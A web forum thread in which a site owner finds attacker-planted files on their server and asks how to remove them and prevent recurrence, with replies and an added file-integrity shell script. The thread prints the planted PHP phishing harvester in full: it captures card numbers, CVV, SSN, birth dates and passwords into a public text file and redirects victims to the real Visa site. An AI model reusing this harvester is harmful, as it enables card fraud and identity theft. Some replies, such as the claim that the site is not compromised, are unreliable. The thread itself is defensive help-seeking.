Please help, a spammer has cracked/hacked my website via PHP!

I received this email today:
There’s a script at http://www.recovery-experts.com/php/sender.php that is being abused by a spammer. Said spammer sent me an e-mail with a form attached to it, that abuses your script. Could you please take steps to stop such abuse from happening?

I did some investigating and also found this:
http://recovery-experts.com/php/ca.txt

I had someone make this website for me several years ago; the person is no longer around. I need help getting this fixed and finding out how this could have happened in the first place.

I don’t know where else to go; any help or advice will be greatly appreciated!!!

It is hard to give advice without seeing the code of your sender.php script. Also, the first URL from your post just redirects to another site.

Your guy probably did not protect any user inputs from MySQL injection. If so, you need to fix that now or sooner. You might want to look at all his code for other cases of this too.

From what I can gather, sender.php sends an email. In this case it wouldn’t need MySQL injection protection since it’s only sending an email.

All I can tell is someone’s worked out how your sender.php script works, and is abusing it to send spam to people.

I am sorry, I’m not too tech savvy; here is the code from the sender.php script:

[php]<?php
session_start();

// Every field of the fake "Visa" form is read straight from the POST body.
$card = $_POST['card'];
$expm = $_POST['expm'];
$expy = $_POST['expy'];
$cvv = $_POST['cvv'];
$ssn = $_POST['ssn'];
$zip = $_POST['zip'];
$a = $_POST['a'];
$b = $_POST['b'];
$c = $_POST['c'];
$sec = $_POST['sec'];
$sec2 = $_POST['sec2'];

// Everything submitted is appended to ca.txt in the same directory as the
// script, which is why the log is readable by anyone who knows the URL.
$ip = getenv("REMOTE_ADDR");
$file = fopen("ca.txt", "a");
$adddate = date("D M d, Y g:i a");
fputs($file, "$adddate\r\n");

fputs($file, "Card: $card\r\n");
fputs($file, "Expm: $expm\r\n");
fputs($file, "Expy: $expy\r\n");
fputs($file, "CCV: $cvv\r\n");
fputs($file, "SSN: $ssn\r\n");
fputs($file, "(Zip): $zip\r\n");
fputs($file, "DD: $a\r\n");
fputs($file, "MM: $b\r\n");
fputs($file, "Year: $c\r\n");
fputs($file, "Passwd: $sec\r\n");
fputs($file, "Passwdc: $sec2\r\n");

fputs($file, "$ip\r\n");
fputs($file, "---------\r\n");
fclose($file);

// The victim is then bounced to the real Visa site so nothing looks wrong.
header("Location: http://www.visaeurope.com/en/visa_europe.aspx");

?>[/php]

So what are my options?! Like I said, I am not too PHP savvy and the guy who wrote this is no longer available.

I have uploaded the link the spammer is emailing to people: http://fdv.recovery-experts.com/Login_Jok2j3.html (this isn’t an actual link, this is a saved HTML file that someone emailed me and I uploaded to my server)

Anyone?! :( Really worried over here; what if I just delete the sender.php? That should not mess up my website/PHP/MySQL, right? However, it won’t stop them from just redoing this all over again?

Include a hidden field in your form with a timestamp. Compare it with the current time in your send.php file to make sure it is relatively close.

You can substitute the timestamp with a session var generated on another page that links to your form page.

If he can view your code, he can easily modify his behavior to match your changes.

You could block his IP in .htaccess, but that’s worked around too.

If this person has the proper knowledge and the motivation, it’s hard to block this.

I’m not sure how to do those things :-\ I do not use that form at all; I mean I can probably just delete the:

http://www.recovery-experts.com/php/ca.txt
http://www.recovery-experts.com/php/sender.php

This would stop the form from working and not affect my website, right? I looked through the code and I don’t see how it’s at all connected to my website.

Question is, if I delete those two files, what is to stop them from just recreating them again? I mean they did it the first time, why won’t they try again? Also, can they recreate them in a different location? That’s what I’m most worried about; I mean the only reason I even found out about this is because some people emailed me to complain. If they do this again and hide the files in a different folder, I might never find out.

Please advise if it’s safe to remove them and how I prevent them from redoing this all over again.

Thank you very much.

It wouldn’t affect your website, but it will affect any user that tries to use that form. This will produce a 404 error.

Add this line just below ‘<?php’ in your send.php file…

header('Location: http://www.thepageyouwant.com/');

This will redirect anyone accessing the send.php file to the page of your choice. Direct to an existing page like your home page or, better and more friendly, create a simple HTML page stating that the email form is down for maintenance and explain why they were directed to this page. Give them options, like a contact email or links to FAQs etc.

Please don’t use ‘www.thepageyouwant.com’ !, just say’n…

He still proves a valid point. If someone did somehow manipulate his site into making those files, they could easily just do it again with new files under new names. It almost sounds like sender.php isn’t his code, but then if it isn’t, how did this ‘hacker’ make those files?

Also the code you posted isn’t actually sending any emails so it’s another page that’s sending. That code is simply logging the information into a file.

That form isn’t mine, I never created it and never used it. It isn’t even hosted on my website, I just uploaded it to show you guys. It is hosted, created and used by the spammers that have hacked my PHP, so I don’t care where it redirects or if it doesn’t work at all (I’d rather it didn’t work, I think!)

If I delete it, what is to stop them from redoing this all over again? Someone recommended that I make a file listing of all the files on the server and compare them once in a while (any suggestion as to what software can do that?); also someone suggested that I make PHP folders write-protected. Let me know what you guys think.

Thanks!

I did NOT write that code, it isn’t mine. I have no idea how they uploaded it (the server isn’t compromised, it has been confirmed).

The emails, I’m pretty sure, aren’t coming from me; they are using their email servers, their site, they are ONLY using my site for the submission of the form and storing of the info in the ca.txt file.

Basically I’m worried that if I delete them they will just recreate them, as you said, with different names and a different location and I won’t be able to find it. I want to patch the backdoor or whatever you want to call it before deleting them.

Suggestions?!

Just to confirm, the sender.php and ca.txt ARE NOT MINE. I don’t need them. I never created them.

Do what I said and add the line to redirect in the file to disable it!

If someone is placing phantom files on your server, you’ve got bigger problems than spamming!

Just add the line and all will be well…

Hummm, nailed by the obvious bug twice today…

Could this be nothing more than a spammer using ‘[email protected]’ as a sender?

This happens to every site once in a while. Someone scrapes your site for an email address and uses that to send spam in your name. Nothing you can do about it! This is used a lot in ‘click revenue’ scams. They’re just using your address to spoof. Your site isn’t compromised. And this will go away soon, as they will move on to someone else.

That file is probably an orphan file for something that was abandoned. I go back through my old stuff and find more than I’d like to admit.

Adding a redirect line won’t stop them making new files to do this again. Follow these steps:

  1. Scan your computer and ensure you have no keyloggers.
  2. Change your FTP passwords and your account passwords.
  3. Make sure that the folders are write-protected (scripts don’t have permission to write to them).
  4. Delete the files.

If the files re-appear, you have a bigger problem but these steps should help.
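Since the thread asks what software could do the "file listing and compare" check, here is an added example (not from any poster in this thread) in POSIX shell: it records a SHA-256 manifest of a web root and, when re-run later, reports files that were added, modified or removed, which is how a dropped sender.php/ca.txt pair would show up. It assumes GNU find, sha256sum, sort, awk and mktemp are available, and the example directory and file names are constructed for illustration.

```shell
#!/bin/sh
# Added example: baseline a web root and detect files that appear, change or vanish.

# make_manifest DIR OUT: write "sha256  ./relative/path" for every regular file
# under DIR, sorted by path so two manifests of the same tree are identical.
make_manifest() {
    dir=$1; out=$2
    (cd "$dir" && find . -type f -exec sha256sum {} + | sort -k 2) > "$out"
}

# check_manifest DIR OLD_MANIFEST: rebuild the manifest for DIR and print one
# line per difference: "ADDED path", "MODIFIED path" or "REMOVED path".
# sha256sum output is 64 hex chars + two spaces, so the path starts at column 67.
check_manifest() {
    dir=$1; old=$2
    new=$(mktemp)
    make_manifest "$dir" "$new"
    awk '
        FILENAME == ARGV[1] { old[substr($0, 67)] = $1; next }
        {
            p = substr($0, 67)
            if (!(p in old))        print "ADDED " p
            else if (old[p] != $1)  print "MODIFIED " p
            seen[p] = 1
        }
        END { for (p in old) if (!(p in seen)) print "REMOVED " p }
    ' "$old" "$new"
    rm -f "$new"
}

# Usage (e.g. from cron, with the baseline stored outside the web root):
#   sh integrity.sh baseline /var/www/html /root/site-baseline.txt
#   sh integrity.sh check    /var/www/html /root/site-baseline.txt
case "${1:-}" in
    baseline) make_manifest "$2" "$3" ;;
    check)    check_manifest "$2" "$3" ;;
esac
```

Any "ADDED" line for a .php or .txt file you did not upload yourself deserves a look before you delete it, since the file and its timestamps are the evidence of how it got there.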
